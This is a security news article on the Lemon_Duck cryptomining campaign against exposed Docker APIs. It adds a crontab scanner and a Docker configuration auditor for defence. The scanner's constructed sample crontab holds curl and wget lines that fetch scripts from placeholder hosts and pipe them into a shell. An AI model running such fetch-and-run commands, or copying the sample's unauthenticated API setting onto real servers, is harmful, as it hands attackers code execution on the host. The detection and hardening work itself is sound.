
Docker APIs on Linux servers have become the target of a large-scale Monero crypto mining campaign run by the operators of the Lemon_Duck botnet.
Crypto mining gangs are a constant threat to poorly secured or misconfigured Docker systems, and multiple massive exploit campaigns have been reported in recent years.
LemonDuck, in particular, previously focused on exploiting vulnerable Microsoft Exchange servers, before targeting Linux machines via SSH brute force attacks, Windows systems vulnerable to SMBGhost, and servers running Redis and Hadoop instances.
According to a Crowdstrike report published today, the threat actor behind the ongoing Lemon_Duck campaign is hiding their wallets behind proxy pools.
Campaign details
Lemon_Duck accesses exposed Docker APIs and runs a malicious container to retrieve a Bash script disguised as a PNG image.
Figure: Adding a malicious cronjob (Crowdstrike)
The payload creates a cronjob in the container to download a Bash file (a.asp) that performs the following actions:
- Kill processes based on names of known mining pools, competing crypto mining groups, etc.
- Kill daemons like crond, sshd, and syslog.
- Remove known IOC (Indicator of Compromise) file paths.
- Disable network connections to C2s known to belong to competing crypto mining groups.
- Disable Alibaba Cloud’s monitoring service that protects instances from risky activities.
Figure: Disabling Alibaba Cloud Monitor (Crowdstrike)
Disabling security features in Alibaba Cloud services was previously observed in crypto mining malware in November 2021, employed by unknown actors.
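The cronjob stage described above is one of the easier parts of this chain to catch on a host, because a fetch-and-run entry looks nothing like ordinary maintenance jobs. The scanner below is an added example for this article, not code from the article or from Crowdstrike: it reads crontab text, flags entries that both download from a remote URL and pipe the result into a shell, and notes payload names that mimic an image or web page (the PNG-disguised script and the a.asp file named in the report). The crontab content is constructed, and its hosts use the reserved .invalid domain as placeholders.

```python
"""Detect fetch-and-run cron jobs of the kind described above.

Added example for this article; it is not code from the article or from
Crowdstrike. The crontab text below is constructed, and the hosts in it use
the reserved .invalid TLD as placeholders."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: a root crontab with ordinary maintenance jobs plus two
# entries that fetch a remote file and pipe it straight into a shell, the
# pattern the campaign uses (a script served under an image-like name).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/healthcheck.sh >> /var/log/healthcheck.log 2>&1
*/1 * * * * curl -fsSL http://placeholder.invalid/img.png | bash
@reboot wget -q -O- http://placeholder.invalid/a.asp | sh
0 0 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
REMOTE_URL = re.compile(r"https?://")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
# Payload names that mimic an image or web page, as in the article
# (a Bash script disguised as a PNG, and the a.asp downloader).
DISGUISED_NAME = re.compile(r"\.(png|asp)\b")


@dataclass(frozen=True)
class Finding:
    line_no: int
    entry: str
    reasons: tuple[str, ...]


def analyze_cron_entry(line: str) -> list[str]:
    """Return the reasons a single crontab line looks like a fetch-and-run job
    (an empty list for comments, blank lines and ordinary commands)."""
    entry = line.strip()
    if not entry or entry.startswith("#"):
        return []
    reasons: list[str] = []
    if DOWNLOADER.search(entry) and REMOTE_URL.search(entry):
        reasons.append("downloader fetches a remote URL")
    if PIPE_TO_SHELL.search(entry):
        reasons.append("fetched content is piped straight into a shell")
    if DISGUISED_NAME.search(entry):
        reasons.append("payload name mimics an image or web page (.png/.asp)")
    return reasons


def scan_crontab(text: str) -> list[Finding]:
    """Flag entries that both download from the network and pipe to a shell;
    a lone "curl https://.../healthz" probe is not reported by itself."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        reasons = analyze_cron_entry(line)
        downloads = any(r.startswith("downloader") for r in reasons)
        pipes = any("shell" in r for r in reasons)
        if downloads and pipes:
            findings.append(Finding(line_no, line.strip(), tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.entry}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run it against /etc/crontab, the files under /etc/cron.d and the per-user spools under /var/spool/cron, inside containers as well as on the host, since the report places the cronjob in the container. Because the same script kills crond, sshd and syslog, a host whose cron or syslog daemon has silently disappeared is itself a signal worth alerting on alongside any hit from this scanner.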
After the above actions are performed, the Bash script downloads and runs the crypto mining utility XMRig along with a configuration file that hides the actor’s wallets behind proxy pools.
After the initially infected machine is set up to mine, Lemon_Duck attempts to make lateral moves using SSH keys found on the file system. If they are available, the attacker uses them to repeat the same infection process.
Figure: Searching for SSH keys on the file system (Crowdstrike)
Keeping Docker Threats Under Control
Parallel to this campaign, Cisco Talos reports on another campaign attributed to TeamTNT that also targets exposed Docker API instances on Amazon Web Services.
That threat group is also trying to disable cloud security services to evade detection and continue mining Monero, Bitcoin, and Ether for as long as possible.
Securely configuring any exposed Docker API is essential, and administrators can start by comparing their configuration against the platform’s published best practices and security recommendations.
In addition, set resource consumption limits for all containers, enforce strict image verification policies, and enforce least privilege principles.
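The three controls the article asks for (an authenticated API, resource limits on every container, least privilege) can be checked mechanically. The audit below is an added example for this article, not code from the article, Crowdstrike or Docker; it assumes the daemon.json keys (hosts, tlsverify, tlscacert, tlscert, tlskey, userns-remap, no-new-privileges, icc) and the HostConfig fields from `docker inspect` (Privileged, Memory, NanoCpus, CpuQuota, PidsLimit, CapAdd) as Docker documents them. The weak configuration shows the exposed-API state the campaign looks for; the hardened one sits beside it, and all four documents are constructed samples.

```python
"""Audit a Docker daemon configuration and a container's HostConfig for the
weak settings the article warns about.

Added example for this article; not code from the article, Crowdstrike or
Docker. The daemon.json keys and HostConfig fields are the ones Docker
documents; the four JSON documents below are constructed samples."""
from __future__ import annotations

import json

# Constructed: API listening on every interface with no TLS client auth,
# the "exposed Docker API" the campaign looks for.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
    "icc": True,
})

# Constructed: the same daemon with mutual TLS on a specific address, a
# remapped root user and no privilege escalation inside containers.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
    "userns-remap": "default",
    "no-new-privileges": True,
    "icc": False,
})

# Constructed HostConfig sections as returned by `docker inspect`.
WEAK_HOSTCONFIG = {"Privileged": True, "Memory": 0, "NanoCpus": 0,
                   "CpuQuota": 0, "PidsLimit": None, "CapAdd": ["SYS_ADMIN"]}
LIMITED_HOSTCONFIG = {"Privileged": False, "Memory": 512 * 1024 * 1024,
                      "NanoCpus": 1_000_000_000, "CpuQuota": 0,
                      "PidsLimit": 256, "CapAdd": None}


def audit_daemon_config(raw_json: str) -> list[str]:
    """Return the weaknesses found in a daemon.json document."""
    cfg = json.loads(raw_json)
    findings: list[str] = []
    tcp = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp and not cfg.get("tlsverify"):
        findings.append("TCP API listener without tlsverify: anyone who can "
                        "reach the port can start containers as root")
    if cfg.get("tlsverify") and not all(
            cfg.get(k) for k in ("tlscacert", "tlscert", "tlskey")):
        findings.append("tlsverify set but CA, cert or key path is missing")
    if any(h.startswith(("tcp://0.0.0.0", "tcp://[::]")) for h in tcp):
        findings.append("TCP API listener bound to all interfaces")
    if not cfg.get("userns-remap"):
        findings.append("userns-remap unset: root in a container is root on the host")
    if not cfg.get("no-new-privileges"):
        findings.append("no-new-privileges unset: setuid binaries can gain "
                        "privileges inside containers")
    if cfg.get("icc", True):
        findings.append("icc enabled (default): containers can reach each other freely")
    return findings


def audit_host_config(hc: dict) -> list[str]:
    """Return the weaknesses in one container's HostConfig (resource limits and
    least privilege, the two controls the article asks for)."""
    findings: list[str] = []
    if hc.get("Privileged"):
        findings.append("privileged container: full device and capability access")
    if not hc.get("Memory"):
        findings.append("no memory limit")
    if not (hc.get("NanoCpus") or hc.get("CpuQuota")):
        findings.append("no CPU limit: a miner can take every core")
    if not hc.get("PidsLimit"):
        findings.append("no pids limit: process spam is unbounded")
    if hc.get("CapAdd"):
        findings.append(f"extra capabilities granted: {hc['CapAdd']}")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak daemon", WEAK_DAEMON_JSON),
                      ("hardened daemon", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_config(cfg) or ["no findings"])
    for name, hc in (("weak container", WEAK_HOSTCONFIG),
                     ("limited container", LIMITED_HOSTCONFIG)):
        print(name, audit_host_config(hc) or ["no findings"])
```

Two caveats when applying this on a real host: on systemd-managed installs the unit file already passes `-H fd://` to dockerd, which conflicts with a "hosts" key in daemon.json, so the listener is normally set in a unit drop-in instead; and a TLS-protected API still belongs behind a firewall or private network, since mutual TLS limits who can issue commands but does not hide the port from the scans this campaign relies on.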
This post, “Docker servers hacked in ongoing crypto mining malware campaign”, was originally published at https://www.bleepingcomputer.com/news/security/docker-servers-hacked-in-ongoing-cryptomining-malware-campaign/
